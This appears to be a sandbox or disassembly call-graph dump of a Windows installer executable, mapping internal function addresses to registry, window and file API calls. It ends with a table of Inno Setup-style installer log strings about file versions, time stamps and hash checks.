54347->54348 54350 40382f 54347->54350 54349 4038a4 4 API calls 54348->54349 54349->54350 54350->54107 54351->54107 54356->54118 54357->54128 54358->54126 54359->54146 54426->54091 54428 47c592 54427->54428 54432 47c5c8 54427->54432 54470 455228 54428->54470 54429 403420 4 API calls 54430 47c6dc 54429->54430 54430->53535 54432->54429 54433 47c6a5 54433->53535 54434 47c5bc 54434->54432 54434->54433 54437 47ad88 43 API calls 54434->54437 54442 47c651 54434->54442 54477 478218 54434->54477 54488 47830c 54434->54488 54492 47c12c 31 API calls 54434->54492 54437->54434 54438 47ad88 43 API calls 54438->54442 54440 42c8f8 5 API calls 54440->54442 54441 42c920 5 API calls 54441->54442 54442->54434 54442->54438 54442->54440 54442->54441 54444 47c692 54442->54444 54493 47c274 58 API calls 54442->54493 54444->54432 54555 465e28 54445->54555 54448->53544 54450 42f3e0 54449->54450 54451 42f403 GetActiveWindow GetFocus 54450->54451 54452 41eeb4 2 API calls 54451->54452 54453 42f41a 54452->54453 54454 42f437 54453->54454 54455 42f427 RegisterClassA 54453->54455 54456 42f4c6 SetFocus 54454->54456 54457 42f445 CreateWindowExA 54454->54457 54455->54454 54459 403400 4 API calls 54456->54459 54457->54456 54458 42f478 54457->54458 54586 42428c 54458->54586 54461 42f4e2 54459->54461 54465 49339c 18 API calls 54461->54465 54462 42f4a0 54463 42f4a8 CreateWindowExA 54462->54463 54463->54456 54464 42f4be ShowWindow 54463->54464 54464->54456 54465->53566 54592 44ad68 54466->54592 54471 455239 54470->54471 54472 455246 54471->54472 54473 45523d 54471->54473 54502 45500c 29 API calls 54472->54502 54494 454f2c 54473->54494 54476 455243 54476->54434 54478 47822e 54477->54478 54479 47822a 54477->54479 54480 403450 4 API calls 54478->54480 54479->54434 54481 47823b 54480->54481 54482 478241 54481->54482 54483 47825b 54481->54483 54531 4780d8 54482->54531 54484 4780d8 19 API calls 54483->54484 54486 478257 54484->54486 54487 403400 4 API calls 54486->54487 54487->54479 54489 478318 54488->54489 54490 478333 54489->54490 54554 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54489->54554 54490->54434 54492->54434 54493->54442 54503 42dd44 54494->54503 54496 454f49 54497 454f97 54496->54497 54506 454e60 54496->54506 54497->54476 54500 454e60 6 API calls 54501 454f78 RegCloseKey 54500->54501 54501->54476 54502->54476 54504 42dd55 RegOpenKeyExA 54503->54504 54505 42dd4f 54503->54505 54504->54496 54505->54504 54511 42dc80 54506->54511 54508 403420 4 API calls 54509 454f12 54508->54509 54509->54500 54510 454e88 54510->54508 54514 42db28 54511->54514 54515 42db4e RegQueryValueExA 54514->54515 54521 42db71 54515->54521 54530 42db93 54515->54530 54516 403400 4 API calls 54518 42dc5f 54516->54518 54517 42db8b 54519 403400 4 API calls 54517->54519 54518->54510 54519->54530 54520 4034e0 4 API calls 54520->54521 54521->54517 54521->54520 54522 403744 4 API calls 54521->54522 54521->54530 54523 42dbc8 RegQueryValueExA 54522->54523 54523->54515 54524 42dbe4 54523->54524 54525 4038a4 4 API calls 54524->54525 54524->54530 54526 42dc26 54525->54526 54527 42dc38 54526->54527 54529 403744 4 API calls 54526->54529 54528 403450 4 API calls 54527->54528 54528->54530 54529->54527 54530->54516 54532 4780f3 54531->54532 54535 4781b2 54532->54535 54536 478124 54532->54536 54549 477f8c 19 API calls 54532->54549 54534 478149 54539 47816a 54534->54539 54551 477f8c 19 API calls 54534->54551 54535->54486 54536->54534 54550 477f8c 19 API calls 54536->54550 54539->54535 54540 4781aa 54539->54540 54552 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54539->54552 54543 477e10 54540->54543 54544 477e4b 54543->54544 54545 403450 4 API calls 54544->54545 54546 477e70 54545->54546 54553 476500 19 API calls 54546->54553 54548 477eb1 54548->54535 54549->54536 54550->54534 54551->54539 54552->54540 54553->54548 54554->54490 54556 403494 4 API calls 54555->54556 54557 465e56 54556->54557 54572 42daf0 54557->54572 54560 42daf0 5 API calls 54561 465e7a 54560->54561 54562 465d14 19 API calls 54561->54562 54563 465e84 54562->54563 54564 42daf0 5 API calls 54563->54564 54565 465e93 54564->54565 54575 465d8c 54565->54575 54568 42daf0 5 API calls 54569 465eac 54568->54569 54570 403400 4 API calls 54569->54570 54571 465ec1 54570->54571 54571->53539 54579 42da38 54572->54579 54576 465dac 54575->54576 54577 4078fc 19 API calls 54576->54577 54578 465df6 54577->54578 54578->54568 54580 42dae3 54579->54580 54581 42da58 54579->54581 54580->54560 54581->54580 54582 4037b8 4 API calls 54581->54582 54584 403800 4 API calls 54581->54584 54585 42c454 IsDBCSLeadByte 54581->54585 54582->54581 54584->54581 54585->54581 54587 4242be 54586->54587 54588 42429e GetWindowTextA 54586->54588 54590 403494 4 API calls 54587->54590 54589 4034e0 4 API calls 54588->54589 54591 4242bc 54589->54591 54590->54591 54591->54462 54595 44abe0 54592->54595 54596 44ac13 54595->54596 54597 414af8 4 API calls 54596->54597 54598 44ac26 54597->54598 54599 44ac53 73A1A570 54598->54599 54600 40357c 4 API calls 54598->54600 54606 41a1f8 54599->54606 54600->54599 54603 44ac84 54607 41a223 54606->54607 54608 41a2bf 54606->54608 54625 403520 54607->54625 54609 403400 4 API calls 54608->54609 54610 41a2d7 SelectObject 54609->54610 54610->54603 54626 4034e0 4 API calls 54625->54626 54627 40352a 54626->54627 54630 4649ff 54628->54630 54629 464ada 54639 4667a4 54629->54639 54630->54629 54634 464a4f 54630->54634 54652 421a2c 54630->54652 54631 464a92 54631->54629 54658 4185c8 7 API calls 54631->54658 54634->54631 54635 464a94 54634->54635 54636 464a89 54634->54636 54637 421a2c 7 API calls 54635->54637 54638 421a2c 7 API calls 54636->54638 54637->54631 54638->54631 54640 4667d4 54639->54640 54641 4667b5 54639->54641 54640->53592 54642 414b28 4 API calls 54641->54642 54643 4667c3 54642->54643 54644 414b28 4 API calls 54643->54644 54644->54640 54646 469f3d 54645->54646 54647 421a2c 7 API calls 54646->54647 54648 469f96 54647->54648 54648->53618 54650 466274 18 API calls 54648->54650 54649->53594 54650->53618 54651->53619 54653 421a84 54652->54653 54656 421a3a 54652->54656 54653->54634 54654 421a69 54654->54653 54667 421d38 SetFocus GetFocus 54654->54667 54656->54654 54659 408cc4 54656->54659 54658->54629 54660 408cd0 54659->54660 54668 406df4 LoadStringA 54660->54668 54663 403450 4 API calls 54664 408d01 54663->54664 54665 403400 4 API calls 54664->54665 54666 408d16 54665->54666 54666->54654 54667->54653 54669 4034e0 4 API calls 54668->54669 54670 406e21 54669->54670 54670->54663 54672 46b7e1 54671->54672 54673 46b82e 54672->54673 54674 414af8 4 API calls 54672->54674 54675 403420 4 API calls 54673->54675 54676 46b7f7 54674->54676 54678 46b8d8 54675->54678 54859 466038 6 API calls 54676->54859 54678->53633 54852 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54678->54852 54679 46b7ff 54680 414b28 4 API calls 54679->54680 54681 46b80d 54680->54681 54682 46b81a 54681->54682 54684 46b833 54681->54684 54860 47d508 42 API calls 54682->54860 54685 46b84b 54684->54685 54687 46611c CharNextA 54684->54687 54861 47d508 42 API calls 54685->54861 54688 46b847 54687->54688 54688->54685 54689 46b861 54688->54689 54690 46b867 54689->54690 54691 46b87d 54689->54691 54862 47d508 42 API calls 54690->54862 54693 42c968 CharNextA 54691->54693 54694 46b88a 54693->54694 54694->54673 54863 4661a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54694->54863 54696 46b8a1 54697 450ab8 4 API calls 54696->54697 54698 46b8ae 54697->54698 54864 47d508 42 API calls 54698->54864 54701 480ab9 54700->54701 54702 480a8b 54700->54702 54704 4749c8 54701->54704 54865 49314c 18 API calls 54702->54865 54866 456f08 54704->54866 54707 4072b0 SetCurrentDirectoryA 54708 474a1e 54707->54708 54853->53641 54859->54679 54860->54673 54861->54673 54862->54673 54863->54696 54864->54673 54865->54701 54867 456f34 54866->54867 54868 45703c 54866->54868 55407 456c04 GetSystemTimeAsFileTime FileTimeToSystemTime 54867->55407 54869 45708d 54868->54869 55411 456774 6 API calls 54868->55411 54872 403400 4 API calls 54869->54872 54874 4570a2 54872->54874 54873 456f3c 54875 4078fc 19 API calls 54873->54875 54874->54707 54876 456fad 54875->54876 55408 456ef8 20 API calls 54876->55408 55407->54873 55411->54869 56610 431740 56571->56610 56573 43d246 56574 403400 4 API calls 56573->56574 56575 43d2ca 56574->56575 56575->53699 56575->53700 56577 43142a 56576->56577 56578 402648 4 API calls 56577->56578 56579 43145a 56578->56579 56580 492c58 56579->56580 56581 492d2d 56580->56581 56585 492c72 56580->56585 56587 492d70 56581->56587 56582 4335c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56582->56585 56585->56581 56585->56582 56586 403450 4 API calls 56585->56586 56615 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56585->56615 56616 4314f4 56585->56616 56586->56585 56588 492d8c 56587->56588 56624 4335c0 56588->56624 56590 492d91 56591 4314f4 4 API calls 56590->56591 56592 492d9c 56591->56592 56593 43cde8 56592->56593 56594 43ce15 56593->56594 56599 43ce07 56593->56599 56594->53710 56595 43ce91 56603 43cf4b 56595->56603 56627 4468d8 56595->56627 56597 43cedc 56633 43d5a4 56597->56633 56599->56594 56599->56595 56600 4468d8 4 API calls 56599->56600 56600->56599 56601 43d151 56601->56594 56653 446878 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56601->56653 56603->56601 56604 43d132 56603->56604 56651 446878 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56603->56651 56652 446878 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56604->56652 56607->53712 56608->53714 56609->53701 56611 403494 4 API calls 56610->56611 56613 43174f 56611->56613 56612 431779 56612->56573 56613->56612 56614 403744 4 API calls 56613->56614 56614->56613 56615->56585 56617 431502 56616->56617 56618 431514 56616->56618 56622 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56617->56622 56620 431536 56618->56620 56623 431494 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56618->56623 56620->56585 56622->56618 56623->56620 56625 402648 4 API calls 56624->56625 56626 4335cf 56625->56626 56626->56590 56628 4468f7 56627->56628 56629 4468fe 56627->56629 56654 446684 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56628->56654 56631 4314f4 4 API calls 56629->56631 56632 44690e 56631->56632 56632->56597 56634 43d5c0 56633->56634 56647 43d5ed 56633->56647 56635 402660 4 API calls 56634->56635 56634->56647 56635->56634 56636 43d622 56636->56603 56638 43f6f9 56638->56636 56640 43c18c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56640->56647 56644 43356c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56644->56647 56645 435ea4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56645->56647 56646 43336c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56646->56647 56647->56636 56647->56638 56647->56640 56647->56644 56647->56645 56647->56646 56648 431494 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56647->56648 56649 446684 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56647->56649 56650 446878 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56647->56650 56655 438f34 56647->56655 56661 4366a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56647->56661 56662 43d49c 18 API calls 56647->56662 56663 433588 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56647->56663 56648->56647 56649->56647 56650->56647 56651->56603 56652->56601 56653->56601 56654->56629 56656 438f3d 56655->56656 56661->56647 56662->56647 56663->56647 56666 2392127 56667 2392130 56666->56667 56668 239210a 56667->56668 56669 45cff4 5 API calls 56667->56669 56669->56668 56670 47efd8 56671 47efe1 56670->56671 56674 47f00c 56670->56674 56673 47effe 56671->56673 56671->56674 56672 47f04b 56675 47f05e 56672->56675 56676 47f06b 56672->56676 57079 4756fc 188 API calls 56673->57079 56674->56672 57081 47d9dc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56674->57081 56679 47f062 56675->56679 56680 47f0a0 56675->56680 56682 47f085 56676->56682 56683 47f074 56676->56683 56685 47f066 56679->56685 56691 47f0e3 56679->56691 56692 47f0fe 56679->56692 56688 47f0c4 56680->56688 56689 47f0a9 56680->56689 56681 47f003 56681->56674 57080 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56681->57080 57084 47dbe8 42 API calls 56682->57084 57083 47db78 42 API calls 56683->57083 56684 47f03e 57082 47db78 42 API calls 56684->57082 56698 47f127 56685->56698 56699 47f145 56685->56699 57086 47dbe8 42 API calls 56688->57086 57085 47dbe8 42 API calls 56689->57085 57087 47dbe8 42 API calls 56691->57087 57088 47dbe8 42 API calls 56692->57088 56701 47f13c 56698->56701 57089 47db78 42 API calls 56698->57089 57091 47d874 24 API calls 56699->57091 57090 47d874 24 API calls 56701->57090 56702 47f143 56705 47f155 56702->56705 56706 47f15b 56702->56706 56707 47f159 56705->56707 56804 47db54 56705->56804 56706->56707 56708 47db54 42 API calls 56706->56708 56809 47b154 56707->56809 56708->56707 57102 47d508 42 API calls 56804->57102 56806 47db6f 57103 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56806->57103 56810 42d864 GetWindowsDirectoryA 56809->56810 56811 47b172 56810->56811 56812 403450 4 API calls 56811->56812 56813 47b17f 56812->56813 56814 42d890 GetSystemDirectoryA 56813->56814 56815 47b187 56814->56815 56816 403450 4 API calls 56815->56816 56817 47b194 56816->56817 56818 42d8bc 6 API calls 56817->56818 56819 47b19c 56818->56819 56820 403450 4 API calls 56819->56820 56821 47b1a9 56820->56821 56822 47b1b2 56821->56822 56823 47b1ce 56821->56823 57124 42d1d4 56822->57124 56824 403400 4 API calls 56823->56824 56826 47b1cc 56824->56826 56828 47b213 56826->56828 56830 42c898 5 API calls 56826->56830 57104 47afdc 56828->57104 56829 403450 4 API calls 56829->56826 56832 47b1ee 56830->56832 56834 403450 4 API calls 56832->56834 56836 47b1fb 56834->56836 56835 403450 4 API calls 56837 47b22f 56835->56837 56836->56828 56841 403450 4 API calls 56836->56841 56838 47b24d 56837->56838 56839 4035c0 4 API calls 56837->56839 56840 47afdc 8 API calls 56838->56840 56839->56838 56842 47b25c 56840->56842 56841->56828 56843 403450 4 API calls 56842->56843 56844 47b269 56843->56844 56845 47b291 56844->56845 56846 42c40c 5 API calls 56844->56846 56847 47b2f8 56845->56847 56851 47afdc 8 API calls 56845->56851 56848 47b27f 56846->56848 57079->56681 57081->56684 57082->56672 57083->56685 57084->56685 57085->56685 57086->56685 57087->56685 57088->56685 57089->56701 57090->56702 57091->56702 57102->56806 57105 42dd44 RegOpenKeyExA 57104->57105 57106 47b002 57105->57106 57107 47b006 57106->57107 57108 47b028 57106->57108 57109 42dc74 6 API calls 57107->57109 57110 403400 4 API calls 57108->57110 57111 47b012 57109->57111 57112 47b02f 57110->57112 57113 47b01d RegCloseKey 57111->57113 57114 403400 4 API calls 57111->57114 57112->56835 57113->57112 57114->57113 57125 4038a4 4 API calls 57124->57125 57127 42d1e7 57125->57127 57126 42d1fe GetEnvironmentVariableA 57126->57127 57128 42d20a 57126->57128 57127->57126 57131 42d211 57127->57131 57134 42daf8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57127->57134 57130 403400 4 API calls 57128->57130 57130->57131 57131->56829 57134->57127 58624 416420 58625 416432 58624->58625 58626 416472 GetClassInfoA 58625->58626 58644 408d34 19 API calls 58625->58644 58627 41649e 58626->58627 58629 4164c0 RegisterClassA 58627->58629 58630 4164b0 UnregisterClassA 58627->58630 58634 4164f9 58627->58634 58632 4164e8 58629->58632 58629->58634 58630->58629 58631 41646d 58631->58626 58633 408cc4 5 API calls 58632->58633 58633->58634 58635 416516 58634->58635 58636 416527 58634->58636 58635->58634 58637 408cc4 5 API calls 58635->58637 58645 40754c 58636->58645 58637->58636 58641 416540 58642 41a1f8 5 API calls 58641->58642 58643 41654a 58642->58643 58644->58631 58646 407550 58645->58646 58647 40755a 58645->58647 58648 402660 4 API calls 58646->58648 58649 418394 7 API calls 58647->58649 58648->58647 58649->58641 58650 49706c 58708 403344 58650->58708 58652 49707a 58711 4056a0 58652->58711 58654 49707f 58714 406334 GetModuleHandleA GetProcAddress 58654->58714 58660 49708e 58731 410964 58660->58731 58662 497093 58735 412938 58662->58735 58981 4032fc 58708->58981 58710 403349 GetModuleHandleA GetCommandLineA 58710->58652 58713 4056db 58711->58713 58982 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58711->58982 58713->58654 58715 406350 58714->58715 58716 406357 GetProcAddress 58714->58716 58715->58716 58717 406366 58716->58717 58718 40636d GetProcAddress 58716->58718 58717->58718 58719 406380 58718->58719 58720 40637c SetProcessDEPPolicy 58718->58720 58721 409954 58719->58721 58720->58719 58983 40902c 58721->58983 58726 408728 7 API calls 58727 409977 58726->58727 58998 409078 GetVersionExA 58727->58998 58730 409b88 6F551CD0 58730->58660 58732 41096e 58731->58732 58733 4109ad GetCurrentThreadId 58732->58733 58734 4109c8 58733->58734 58734->58662 59000 40af0c 58735->59000 58981->58710 58982->58713 58984 408cc4 5 API calls 58983->58984 58985 40903d 58984->58985 58986 4085e4 GetSystemDefaultLCID 58985->58986 58990 40861a 58986->58990 58987 408570 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 58987->58990 58988 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58988->58990 58989 406df4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 58989->58990 58990->58987 58990->58988 58990->58989 58991 40867c 58990->58991 58992 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58991->58992 58993 406df4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 58991->58993 58994 408570 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 58991->58994 58995 4086ff 58991->58995 58992->58991 58993->58991 58994->58991 58996 403420 4 API calls 58995->58996 58997 408719 58996->58997 58997->58726 58999 40908f 58998->58999 58999->58730 59002 40af13 59000->59002 59001 40af32 59004 41101c 59001->59004 59002->59001 59011 40ae44 19 API calls 59002->59011 59005 41103e 59004->59005 59006 406df4 5 API calls 59005->59006 59007 403450 4 API calls 59005->59007 59008 41105d 59005->59008 59006->59005 59007->59005 59009 403400 4 API calls 59008->59009 59010 411072 59009->59010 59011->59002 60345 41ee64 60346 41ee73 IsWindowVisible 60345->60346 60347 41eea9 60345->60347 60346->60347 60348 41ee7d IsWindowEnabled 60346->60348 60348->60347 60349 41ee87 60348->60349 60350 402648 4 API calls 60349->60350 60351 41ee91 EnableWindow 60350->60351 60351->60347 60352 41fb68 60353 41fb71 60352->60353 60356 41fe0c 60353->60356 60355 41fb7e 60357 41fe23 60356->60357 60358 41fefe 60356->60358 60357->60358 60377 41f9cc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 60357->60377 60358->60355 60360 41fe59 60361 41fe83 60360->60361 60362 41fe5d 60360->60362 60387 41f9cc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 60361->60387 60378 41fbac 60362->60378 60366 41fe91 60368 41fe95 60366->60368 60369 41febb 60366->60369 60367 41fbac 10 API calls 60371 41fe81 60367->60371 60372 41fbac 10 API calls 60368->60372 60370 41fbac 10 API calls 60369->60370 60373 41fecd 60370->60373 60371->60355 60374 41fea7 60372->60374 60375 41fbac 10 API calls 60373->60375 60376 41fbac 10 API calls 60374->60376 60375->60371 60376->60371 60377->60360 60379 41fbc7 60378->60379 60380 41fbdd 60379->60380 60381 41f94c 4 API calls 60379->60381 60388 41f94c 60380->60388 60381->60380 60383 41fc25 60384 41fc48 SetScrollInfo 60383->60384 60396 41faac 60384->60396 60387->60366 60389 4181f0 60388->60389 60390 41f969 GetWindowLongA 60389->60390 60391 41f9a6 60390->60391 60392 41f986 60390->60392 60408 41f8d8 GetWindowLongA GetSystemMetrics GetSystemMetrics 60391->60408 60407 41f8d8 GetWindowLongA GetSystemMetrics GetSystemMetrics 60392->60407 60395 41f992 60395->60383 60397 41faba 60396->60397 60398 41fac2 60396->60398 60397->60367 60399 41fb01 60398->60399 60400 41faf1 60398->60400 60406 41faff 60398->60406 60410 417e58 IsWindowVisible ScrollWindow SetWindowPos 60399->60410 60409 417e58 IsWindowVisible ScrollWindow SetWindowPos 60400->60409 60403 41fb41 GetScrollPos 60403->60397 60404 41fb4c 60403->60404 60405 41fb5b SetScrollPos 60404->60405 60405->60397 60406->60403 60407->60395 60408->60395 60409->60406 60410->60406 60411 4205a8 60412 4205bb 60411->60412 60432 415b40 60412->60432 60414 420702 60415 420719 60414->60415 60439 4146e4 KiUserCallbackDispatcher 60414->60439 60416 420730 60415->60416 60440 414728 KiUserCallbackDispatcher 60415->60440 60422 420752 60416->60422 60441 420070 12 API calls 60416->60441 60417 420661 60437 420858 20 API calls 60417->60437 60418 4205f6 60418->60414 60418->60417 60425 420652 MulDiv 60418->60425 60423 42067a 60423->60414 60438 420070 12 API calls 60423->60438 60436 41a314 LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 60425->60436 60428 420697 60429 4206b3 MulDiv 60428->60429 60430 4206d6 60428->60430 60429->60430 60430->60414 60431 4206df MulDiv 60430->60431 60431->60414 60433 415b52 60432->60433 60442 414480 60433->60442 60435 415b6a 60435->60418 60436->60417 60437->60423 60438->60428 60439->60415 60440->60416 60441->60422 60443 41449a 60442->60443 60446 410658 60443->60446 60445 4144b0 60445->60435 60449 40dea4 60446->60449 60448 41065e 60448->60445 60450 40df06 60449->60450 60451 40deb7 60449->60451 60456 40df14 60450->60456 60454 40df14 19 API calls 60451->60454 60455 40dee1 60454->60455 60455->60448 60457 40df24 60456->60457 60459 40df3a 60457->60459 60468 40d7e0 60457->60468 60488 40e29c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 60457->60488 60471 40e14c 60459->60471 60462 40df42 60463 40d7e0 5 API calls 60462->60463 60464 40dfae 60462->60464 60474 40dd60 60462->60474 60463->60462 60465 40e14c 5 API calls 60464->60465 60467 40df10 60465->60467 60467->60448 60489 40ec08 60468->60489 60497 40d6bc 60471->60497 60475 40e154 5 API calls 60474->60475 60476 40dd93 60475->60476 60477 40eb6c 5 API calls 60476->60477 60478 40dd9e 60477->60478 60479 40eb6c 5 API calls 60478->60479 60480 40dda9 60479->60480 60481 40ddc4 60480->60481 60482 40ddbb 60480->60482 60487 40ddc1 60480->60487 60506 40dbd8 60481->60506 60509 40dcc8 19 API calls 60482->60509 60485 403420 4 API calls 60486 40de8f 60485->60486 60486->60462 60487->60485 60488->60457 60492 40d980 60489->60492 60494 40d98b 60492->60494 60493 40d7ea 60493->60457 60494->60493 60496 40d9cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 60494->60496 60496->60494 60498 40ec08 5 API calls 60497->60498 60499 40d6c9 60498->60499 60500 40d6dc 60499->60500 60504 40ed0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 60499->60504 60500->60462 60502 40d6d7 60505 40d658 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 60502->60505 60504->60502 60505->60500 60510 40ad7c 19 API calls 60506->60510 60508 40dc00 60508->60487 60509->60487 60510->60508 60511 440be8 60512 440bf1 60511->60512 60513 440bff WriteFile 60511->60513 60512->60513 60514 440c0a 60513->60514 60515 40ce34 60518 406f18 WriteFile 60515->60518 60519 406f35 60518->60519 60520 4222f4 60521 422303 60520->60521 60526 421284 60521->60526 60525 422323 60527 4212f3 60526->60527 60528 421293 60526->60528 60532 421304 60527->60532 60551 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 60527->60551 60528->60527 60550 408d34 19 API calls 60528->60550 60530 4213ca 60537 4213de SetMenu 60530->60537 60547 4213a3 60530->60547 60531 421332 60536 4213a5 60531->60536 60541 42134d 60531->60541 60532->60530 60532->60531 60533 4213f6 60554 4211cc 10 API calls 60533->60554 60539 4213b9 60536->60539 60536->60547 60537->60547 60538 4213fd 60538->60525 60549 4221f8 10 API calls 60538->60549 60542 4213c2 SetMenu 60539->60542 60543 421370 GetMenu 60541->60543 60541->60547 60542->60547 60544 421393 60543->60544 60545 42137a 60543->60545 60552 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 60544->60552 60548 42138d SetMenu 60545->60548 60547->60533 60553 421e3c 11 API calls 60547->60553 60548->60544 60549->60525 60550->60528 60551->60532 60552->60547 60553->60533 60554->60538 60555 44acfc 60556 44ad0a 60555->60556 60558 44ad29 60555->60558 60557 44abe0 11 API calls 60556->60557 60556->60558 60557->60558 60559 447f7c 60560 447fb1 60559->60560 60561 447faa 60559->60561 60562 447fd0 60560->60562 60563 447fba 60560->60563 60565 403400 4 API calls 60561->60565 60564 403494 4 API calls 60562->60564 60605 447d80 7 API calls 60563->60605 60568 447fde 60564->60568 60569 44815b 60565->60569 60567 447fc5 60567->60562 60570 447fc9 60567->60570 60571 4037b8 4 API calls 60568->60571 60570->60561 60572 447ffa 60571->60572 60573 4037b8 4 API calls 60572->60573 60574 448016 60573->60574 60574->60561 60575 44802a 60574->60575 60576 4037b8 4 API calls 60575->60576 60577 448044 60576->60577 60578 431424 4 API calls 60577->60578 60579 448066 60578->60579 60580 4314f4 4 API calls 60579->60580 60586 448086 60579->60586 60580->60579 60581 4480dc 60594 441b88 60581->60594 60584 4480c4 60584->60581 60607 442e24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60584->60607 60585 448110 GetLastError 60608 447d14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60585->60608 60586->60584 60606 442e24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60586->60606 60589 44811f 60609 442e64 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60589->60609 60591 448134 60610 442e74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60591->60610 60593 44813c 60595 442b66 60594->60595 60596 441bc1 60594->60596 60598 403400 4 API calls 60595->60598 60597 403400 4 API calls 60596->60597 60599 441bc9 60597->60599 60600 442b7b 60598->60600 60601 431424 4 API calls 60599->60601 60600->60585 60602 441bd5 60601->60602 60603 442b56 60602->60603 60611 441260 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60602->60611 60603->60585 60605->60567 60606->60586 60607->60581 60608->60589 60609->60591 60610->60593 60611->60602 60612 47ef3e 60613 450664 5 API calls 60612->60613 60614 47ef52 60613->60614 60615 47e064 21 API calls 60614->60615 60616 47ef76 60615->60616 60617 40d07c 60618 40d084 60617->60618 60619 40d0b2 60618->60619 60620 40d0a7 60618->60620 60626 40d0ae 60618->60626 60621 40d0b6 60619->60621 60622 40d0c8 60619->60622 60630 4062a0 GlobalHandle GlobalUnlock GlobalFree 60620->60630 60629 406274 GlobalAlloc GlobalLock 60621->60629 60631 406284 GlobalHandle GlobalUnlock GlobalReAlloc GlobalLock 60622->60631 60627 40d0c4 60627->60626 60628 408cc4 5 API calls 60627->60628 60628->60626 60629->60627 60630->60626 60631->60627 60632 4165fc 73A25CF0
                                                                                                            Strings
                                                                                                            • Version of existing file: %u.%u.%u.%u, xrefs: 0046FB60
                                                                                                            • Non-default bitness: 32-bit, xrefs: 0046F89F
                                                                                                            • Time stamp of existing file: (failed to read), xrefs: 0046FA1B
                                                                                                            • Version of our file: %u.%u.%u.%u, xrefs: 0046FAD4
                                                                                                            • Stripped read-only attribute., xrefs: 0046FEAB
                                                                                                            • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0046FE7A
                                                                                                            • Installing into GAC, xrefs: 004706D1
                                                                                                            • Skipping due to "onlyifdoesntexist" flag., xrefs: 0046F9B2
                                                                                                            • Dest file exists., xrefs: 0046F99F
                                                                                                            • Installing the file., xrefs: 0046FEED
                                                                                                            • Couldn't read time stamp. Skipping., xrefs: 0046FD19
                                                                                                            • Non-default bitness: 64-bit, xrefs: 0046F893
                                                                                                            • Dest filename: %s, xrefs: 0046F878
                                                                                                            • Version of our file: (none), xrefs: 0046FAE0
                                                                                                            • Existing file is a newer version. Skipping., xrefs: 0046FBE6
                                                                                                            • Existing file has a later time stamp. Skipping., xrefs: 0046FDB3
                                                                                                            • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 0046FC99
                                                                                                            • Time stamp of our file: %s, xrefs: 0046F97F
                                                                                                            • Uninstaller requires administrator: %s, xrefs: 00470159
                                                                                                            • InUn, xrefs: 00470129
                                                                                                            • Time stamp of existing file: %s, xrefs: 0046FA0F
                                                                                                            • Failed to strip read-only attribute., xrefs: 0046FEB7
                                                                                                            • -- File entry --, xrefs: 0046F6DF
                                                                                                            • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 0046FCB4
                                                                                                            • Version of existing file: (none), xrefs: 0046FCDE
                                                                                                            • Same time stamp. Skipping., xrefs: 0046FD39
                                                                                                            • Time stamp of our file: (failed to read), xrefs: 0046F98B
                                                                                                            • Existing file is protected by Windows File Protection. Skipping., xrefs: 0046FDD0
                                                                                                            • Will register the file (a type library) later., xrefs: 004704D0
                                                                                                            • P, xrefs: 0046F72A
                                                                                                            • Will register the file (a DLL/OCX) later., xrefs: 004704DC
                                                                                                            • @, xrefs: 0046F794
                                                                                                            • Dest file is protected by Windows File Protection., xrefs: 0046F8D1
                                                                                                            • Skipping due to "onlyifdestfileexists" flag., xrefs: 0046FEDE
                                                                                                            • Incrementing shared file count (64-bit)., xrefs: 00470549
                                                                                                            • , xrefs: 0046FBB3, 0046FD84, 0046FE02
                                                                                                            • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 0046FCA8
                                                                                                            • .tmp, xrefs: 0046FF9B
                                                                                                            • Same version. Skipping., xrefs: 0046FCC9
